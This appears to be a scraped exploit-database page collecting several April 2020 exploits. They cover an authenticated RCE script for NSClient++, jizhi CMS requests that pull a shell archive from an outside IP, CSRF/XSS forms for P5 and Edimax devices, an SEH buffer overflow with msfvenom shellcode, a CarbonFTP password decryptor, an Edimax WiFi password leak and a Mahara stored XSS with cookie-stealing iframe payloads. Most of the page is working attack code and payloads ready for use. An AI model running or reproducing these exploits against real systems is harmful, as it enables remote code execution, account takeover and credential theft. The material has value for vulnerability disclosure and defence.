ISHACK AI BOT

# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution # Google Dork: N/A # Date: 2020-04-20 # Exploit Author: kindredsec # Vendor Homepage: https://nsclient.org/ # Software Link: https://nsclient.org/download/ # Version: 0.5.2.35 # Tested on: Microsoft Windows 10 Pro (x64) # CVE: N/A # # NSClient++ is a monitoring agent that has the option to run external scripts. # This feature can allow an attacker, given they have credentials, the ability to execute # arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt # Default, this leads to privileged code execution. #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup as bs import urllib3 import json import sys import random import string import time import argparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def generateName(): letters = string.ascii_lowercase + string.ascii_uppercase return ''.join(random.choice(letters) for i in range(random.randint(8,13))) def printStatus(message, msg_type): C_YELLOW = '\033[1;33m' C_RESET = '\033[0m' C_GREEN = '\033[1;32m' C_RED = '\033[1;31m' if msg_type == "good": green_plus = C_GREEN + "[+]" + C_RESET string = green_plus + " " + message elif msg_type == "info": yellow_ex = C_YELLOW + "[!]" + C_RESET string = yellow_ex + " " + message elif msg_type == "bad": red_minus = C_RED + "[-]" + C_RESET string = red_minus + " " + message print(string) # This function adds a new external script containing the desired # command, then saves the configuration def configurePayload(session, cmd, key): printStatus("Configuring Script with Specified Payload . . .", "info") endpoint = "/settings/query.json" node = { "path" : "/settings/external scripts/scripts", "key" : key } value = { "string_data" : cmd } update = { "node" : node , "value" : value } payload = [ { "plugin_id" : "1234", "update" : update } ] json_data = { "type" : "SettingsRequestMessage", "payload" : payload } out = session.post(url = base_url + endpoint, json=json_data, verify=False) if "STATUS_OK" not in str(out.content): printStatus("Error configuring payload. Hit error at: " + endpoint, "bad") sys.exit(1) printStatus("Added External Script (name: " + key + ")", "good") time.sleep(3) printStatus("Saving Configuration . . .", "info") header = { "version" : "1" } payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ] json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload } session.post(url = base_url + endpoint, json=json_data, verify=False) # Since the application needs to be restarted after making changes, # this function reloads the application, and waits for it to come back. def reloadConfig(session): printStatus("Reloading Application . . .", "info") endpoint = "/core/reload" session.get(url = base_url + endpoint, verify=False) # Wait until the application successfully reloads by making a request # every 10 seconds until it responds. printStatus("Waiting for Application to reload . . .", "info") time.sleep(10) response = False count = 0 while not response: try: out = session.get(url = base_url, verify=False, timeout=10) if len(out.content) > 0: response = True except: count += 1 if count > 10: printStatus("Application failed to reload. Nice DoS exploit! /s", "bad") sys.exit(1) else: continue # This function makes the call to the new external script to # ultimately execute the code. def triggerPayload(session, key): printStatus("Triggering payload, should execute shortly . . .", "info") endpoint = "/query/" + key try: session.get(url = base_url + endpoint, verify=False, timeout=10) except requests.exceptions.ReadTimeout: printStatus("Timeout exceeded. Assuming your payload executed . . .", "info") sys.exit(0) # Before setting up the exploit, this function makes sure the # required feature (External Scripts) is enabled on the application. def enableFeature(session): printStatus("Enabling External Scripts Module . . .", "info") endpoint = "/registry/control/module/load" params = { "name" : "CheckExternalScripts" } out = session.get(url = base_url + endpoint, params=params, verify=False) if "STATUS_OK" not in str(out.content): printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad") sys.exit(1) # This function obtains an authentication token that gets added to all # remaining headers. def getAuthToken(session): printStatus("Obtaining Authentication Token . . .", "info") endpoint = "/auth/token" params = { "password" : password } auth = session.get(url = base_url + endpoint, params=params, verify=False) if "auth token" in str(auth.content): j = json.loads(auth.content) authToken = j["auth token"] printStatus("Got auth token: " + authToken, "good") return authToken else: printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad") sys.exit(1) parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE") parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.') parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.') parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.') parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target') args = parser.parse_args() if len(sys.argv) < 4: parser.print_help() sys.exit(1) # Build base URL, grab needed arguments base_url = "https://" + args.t + ":" + args.P printStatus("Targeting base URL " + base_url, "info") password = args.p cmd = args.c # Get first auth token, and add it to headers of session s = requests.session() token = getAuthToken(s) s.headers.update({ "TOKEN" : token}) # Generate a random name, enable the feature, add the payload, # then reload. randKey = generateName() enableFeature(s) configurePayload(s, cmd, randKey) reloadConfig(s) # Since application was reloaded, need a new auth token. token = getAuthToken(s) s.headers.update({ "TOKEN" : token}) # Execute our code. triggerPayload(s, randKey)

# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download # Google Dork: jizhicms # Date: 2020-04-18 # Exploit Author: iej1ctk1g # Vendor Homepage: https://www.jizhicms.cn/ # Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip # Version: 1.6.7 # Tested on： Mac OS # CVE : N/A Data 1. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 86 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip Data 2. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 32 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=file-upzip&filepath=shell

# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) # Google Dork:jizhicms # Date: 2020-04-18 # Exploit Author: iej1ctk1g # Product web page: https://www.p5.hu # Affected version: 1.0.20, 1.0.11 # CVE : N/A <!-- P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting Vendor: P5 Product web page: https://www.p5.hu Affected version: 1.0.20, 1.0.11 Summary: The FNIP-8x16A is an eight channel relay module used for switching any type of load that doesn’t exceed the specifications. Via its built-in web site and TCP/IP communication, the outputs and inputs can be controlled and monitored from standard network capable devices such as computers, smartphones, web-tablets, etc. either locally or via the network. The module can be used independently or as part of a complex control system in residential and commercial installations. Desc: The controller suffers from CSRF and XSS vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Linux CGI Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5564 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php 29.01.2020 --> <!-- CSRF add admin user --> <html> <body> <form action="http://192.168.1.17:83/user.cgi" method="POST"> <input type="hidden" name="uno" value="1" /> <!-- User number (user1) --> <input type="hidden" name="un" value="testingus" /> <!-- Username --> <input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer --> <input type="hidden" name="enabled" value="1" /> <input type="hidden" name="pw" value="123456" /> <input type="hidden" name="pw2" value="123456" /> <input type="submit" value="Zubmit" /> </form> </body> </html> <!-- CSRF change admin password --> <html> <body> <form action="http://192.168.1.17:83/user.cgi" method="POST"> <input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow --> <input type="hidden" name="pw" value="123456" /> <input type="hidden" name="pw2" value="123456" /> <input type="submit" value="Zubmit" /> </form> </body> </html> <!-- XSS modify labels --> <html> <body> <form action="http://192.168.1.17:83/config.html" method="POST"> <input type="hidden" name="lab1" value="Channel1" /> <input type="hidden" name="lab2" value="Channel2" /> <input type="hidden" name="lab3" value="Channel3" /> <input type="hidden" name="lab4" value='"><script>confirm(251)</script>' /> <input type="hidden" name="lab12" value="etc." /> <input type="submit" value="Zubmit" /> </form> </body> </html>

# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) # Date: 2020-04-20 # Author: Felipe Winsnes # Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe # Version: 3.1.3.2.2010.06.13 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open 'RmDownloader.exe' # 4.- Go to 'Load' tab # 5.- Paste clipboard in 'Load' parameter # 6.- Click on button 'OK' # 7.- Two messageboxes regarding the length of the payload will pop up, click OK # 8.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" buf += b"\x50\x65\x67\x70\x41\x41" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll) buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close()

# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption # Date: 2020-04-20 # Author: hyp3rlinx # Vendor: # CVE: CVE-2020-6857 import time, string, sys, argparse, os, codecs #Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version. #This should be compatible for Python 2 and 3 versions now, tested successfully. #Sample test password #LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program. chunk_sz=5 #number of bytes we must decrypt the password by. #Password is stored here: #C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP #Neowise CarbonFTP v1.4 #Insecure Proprietary Password Encryption #By John Page (aka hyp3rlinx) #Apparition Security #=================================================== def carbonftp_conf(conf_file): p="" pipe=-1 passwd="" lst_of_passwds=[] try: for p in conf_file: idx = p.find("Password=STRING|") if idx != -1: pipe = p.find("|") if pipe != -1: passwd = p[pipe + 2: -2] print(" Password found: "+ passwd) lst_of_passwds.append(passwd) except Exception as e: print(str(e)) return lst_of_passwds def reorder(lst): k=1 j=0 for n in range(len(lst)): k+=1 j+=1 try: tmp = lst[n+k] a = lst[n+j] lst[n+j] = tmp lst[n+k] = a except Exception as e: pass return ''.join(lst) def dec2hex(dec): tmp = str(hex(int(dec))) return str(tmp[2:]) #Updated for Python version compatibility. def hex2ascii(h): h=h.strip() passwd="" try: passwd = codecs.decode(h, "hex").decode("ascii") except Exception as e: print("[!] In hex2ascii(), not a valid hex string.") exit() return passwd def chunk_passwd(passwd_lst): lst = [] for passwd in passwd_lst: while passwd: lst.append(passwd[:chunk_sz]) passwd = passwd[chunk_sz:] return lst def strip_non_printable_char(str): return ''.join([x for x in str if ord(x) > 31 or ord(x)==9]) cnt = 0 passwd_str="" def deob(c): global cnt, passwd_str tmp="" try: tmp = int(c) - int(key, 16) tmp = dec2hex(tmp) except Exception as e: print("[!] Not a valid CarbonFTP encrypted password.") exit() b="" a="" #Seems we can delete the second char as its most always junk. if cnt!=1: a = tmp[:2] cnt+=1 else: b = tmp[:4] passwd_str += strip_non_printable_char(hex2ascii(a + b)) hex_passwd_lst = list(passwd_str) return hex_passwd_lst def no_unique_chars(lst): c=0 k=1 j=0 for i in range(len(lst)): k+=1 j+=1 try: a = lst[i] b = lst[i+1] if a != b: c+=1 elif c==0: print("[!] Possible one char password?: " +str(lst[0])) return lst[0] except Exception as e: pass return False def decryptor(result_lst): global passwd_str, sz print(" Decrypting ... \n") for i in result_lst: print("[-] "+i) time.sleep(0.1) lst = deob(i) #Re-order chars to correct sequence using custom swap function (reorder). reordered_pass = reorder(lst) sz = len(reordered_pass) #Flag possible single char password. no_unique_chars(lst) print("[+] PASSWORD LENGTH: " + str(sz)) if sz == 9: return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass) #Shorter passwords less then nine chars will have several candidates #as they get padded with repeating chars so we return those. passwd_str="" return reordered_pass def display_cracked_passwd(sz, passwd): if sz==9: print("[*] PASSWORD CANDIDATES: "+ passwd + "\n") else: print("[*] DECRYPTED PASSWORD: "+passwd + "\n") def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files") parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password") return parser.parse_args() def main(args): global passwd_str, sz victim="" if args.user and args.encrypted_password: print("[!] Supply a victims username -u or single encrypted password -p, not both.") exit() print("[+] Neowise CarbonFTP v1.4") time.sleep(0.1) print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption") time.sleep(0.1) print("[+] Version 2 Exploit fixed for Python 3 compatibility") time.sleep(0.1) print("[+] Discovered and cracked by hyp3rlinx") time.sleep(0.1) print("[+] ApparitionSec\n") time.sleep(1) #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag. if args.user: victim = args.user os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/") dir_lst = os.listdir(".") for c in dir_lst: f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r") #Get encrypted password from conf file passwd_enc = carbonftp_conf(f) #Break up into 5 byte chunks as processed by the proprietary decryption routine. result_lst = chunk_passwd(passwd_enc) #Decrypt the 5 byte chunks and reassemble to the cleartext password. cracked_passwd = decryptor(result_lst) #Print cracked password or candidates. display_cracked_passwd(sz, cracked_passwd) time.sleep(0.3) passwd_str="" f.close() #Crack a single password -p flag. if args.encrypted_password: passwd_to_crack_lst = [] passwd_to_crack_lst.append(args.encrypted_password) result = chunk_passwd(passwd_to_crack_lst) #Print cracked password or candidates. cracked_passwd = decryptor(result) display_cracked_passwd(sz, cracked_passwd) if __name__=="__main__": parser = argparse.ArgumentParser() if len(sys.argv)==1: parser.print_help(sys.stderr) exit() main(parse_args())

# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) # Date: 2020-04-21 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ----------------------------- Here step by step : 1. I did Setup 2. After setup try to access to *wlencrypt_wiz.asp* file 3. After access to this file, I saw some information disclosure (Like *WiFi Password*) 4. Here is the all leak here: ------------------------------- <SCRIPT> var _DATE_="Mon Sep 24 19:38:17 CST 2012"; var _VERSION_="1.13"; var _MODEL_="EW7438RPN"; var _MODE_="Edimax"; var _PLATFORM_="RTL8196CS_1200"; var _HW_LED_WPS_="4"; var _HW_LED_POWER_="6"; var _HW_LED_WIRELESS_="2"; var _HW_BUTTON_RESET_="5"; var _HW_BUTTON_WPS_="1"; var _HW_BUTTON_SWITCH_="3"; var _HW_LED_USB_="17"; var _WIRELESS_IGMPSNOOP_="y"; var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y"; var _RDISC_="y"; var _WPS_NO_BROADCAST_="y"; var _UPNP_LIB_VERSION2_="y"; var _WDS_UR_INFO_="y"; var _RESERVE_ENCRYPTION_SETTING_="y"; var _IGMP_PROXY_="y"; var _IGMPSNOOP_="y"; var _RFTYPE_="2T2R"; var _MEMBUS_="16"; var _MEMSIZE_="16"; var _MEMTYPE_="SDRAM"; var _FLASHTYPE_="SPI"; var _REMOVE_RADIUS_SERVER_="y"; var _AUTO_CHANNEL_DET_="y"; var _CONTROL_SIDEBAND_="y"; var _WIFI_11N_STANDARD_="y"; var _SETTING_WIZARD_="y"; var _CONFIG_FILE_NAME_="7438RPN"; var _AP_WITH_DNS_="y"; var _USE_DNRD_="y"; var _WPS_MIX_="y"; var _POWER_SAVING_="y"; var _WEB_FILE_NAME_="7438RPN"; var _PINCODE_BY_MAC_="y"; var _UPNP_RESPONDER_="y"; var _MDNS_RESPONDER_="y"; var _NETBIOS_RESPONDER_="y"; var _AP_WITH_DHCP_CLIENT_="y"; var _LLTD_NODENAME_="y"; var _DHCP_SWITCH_="y"; var _CONNECT_TEST_="y"; var _START_BOA_="y"; var _WPS_Daemon_="y"; var security = 1; apMode = 6; methodVal = 2; opMode = 0; apMachType = 1; var ssidTbl = new Array("PentesterTraining"); var mirrorTbl = ""; var secModeTbl = new Array("2"); var enable1XTbl = new Array("0"); var _1xMode = "0"; var wepTbl = new Array("0"); var keyTypeTbl = new Array("1"); var wpaCipherTbl = new Array("2"); var pskFormatTbl = new Array("0"); var pskValueTbl = new Array("wifipass123."); var defaultKeyIdTbl=new Array("0"); var rsIp= ""; var rsPort= "1812"; var rsPassword= ""; -- Besim ALTINOK *Security Engineer*

# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering) # Date: 2020-04-21 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version CSRF PoC - Mac Filtering ---------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://172.20.10.2/goform/formWlAc" method="POST"> <input type="hidden" name="wlanAcEnabled" value="ON" /> <input type="hidden" name="tiny&#95;idx" value="0" /> <input type="hidden" name="mac" value="ccbbbbbbbbbb" /> <input type="hidden" name="comment" value="PentesterTraining" /> <input type="hidden" name="addFilterMac" value="Add" /> <input type="hidden" name="submit&#45;url" value="&#47;macfilter1&#95;sub1&#46;asp" /> <input type="hidden" name="wlanSSIDIndex" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> -- Besim ALTINOK *Security Engineer*

# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-21 # Vendor: https://mahara.org # Software Link: https://launchpad.net/mahara # CVE: N/A Document Title: =============== Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2217 Release Date: ============= 2020-04-21 Common Vulnerability Scoring System: ==================================== 4.3 Affected Product(s): ==================== Catalyst IT Ltd. Product: Mahara v19.10.2 - CMS (Web-Application) https://launchpad.net/mahara & https://mahara.org Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Mahara v19.10.2 CMS web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `nombre` and `descripción` parameters of the `Ficheros` module in the `groupfiles.php` file. Remote attackers with low privileges are able to inject own malicious persistent script code as files and foldernames. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Files are able to be reviewed in the backend by higher privileged accounts and can be shared. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Ficheros (Files Manager) Vulnerable Input(s): [+] Crear Carpeta Vulnerable File(s): [+] groupfiles.php Vulnerable Parameter(s): [+] nombre [+] descripción Affected Module(s): [+] Página principal Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the web-application and login as regular user 2. Move inside the mygroup management 3. Open the ficheros tab on top 4. Inject test payload into the crear carpeta (Nombre & Descripción) input field for the página principal to output Note: The execution point occurs on edit, list and delete interaction 5. The created path listings are available for higher privileged user account that review (Backend) 6. Successul reproduce of the persistent cross site web vulnerability! PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal) <tr id="file:7191" class="file-item folder no-hover ui-droppable"> <td class="icon-cell"> <div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191" tabindex="0"> <span class="sr-only">Seleccionar y arrastrar para mover >"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> <span class="icon-folder-open icon icon-lg " role="presentation" aria-hidden="true"></span> </div></td> <td class="filename"> <a href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27" id="changefolder:7191" class="inner-link changefolder"> <span class="sr-only">Carpeta:</span> <span class="display-title ">>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> </a></td> <td class="filedescription d-none d-md-table-cell"> >"<iframe></iframe> >"<iframe></iframe></td> <td class="filesize"></td> <td class="filedate">20/04/2020</td> <!-- Ensure space for 3 buttons (in the case of a really long single line string in a user input field --> <td class="text-right control-buttons "> <div class="btn-group"> ... ... <button name="files_filebrowser_edit[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-pencil-alt icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Edit folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span></button> <button name="files_filebrowser_delete[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-trash-alt text-danger icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Delete folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span> </button></div></td> --- PoC Session Logs [POST] --- (Mygroup Ficheros) https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------98107146915324237501974151621 Content-Length: 4879 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& files_filebrowser_edit_title=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& files_filebrowser_edit_licensor=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on& files_filebrowser_update[7191]=Guardar cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 - POST: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2- https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= - Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------126319663526561351602937008964 Content-Length: 3721 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& 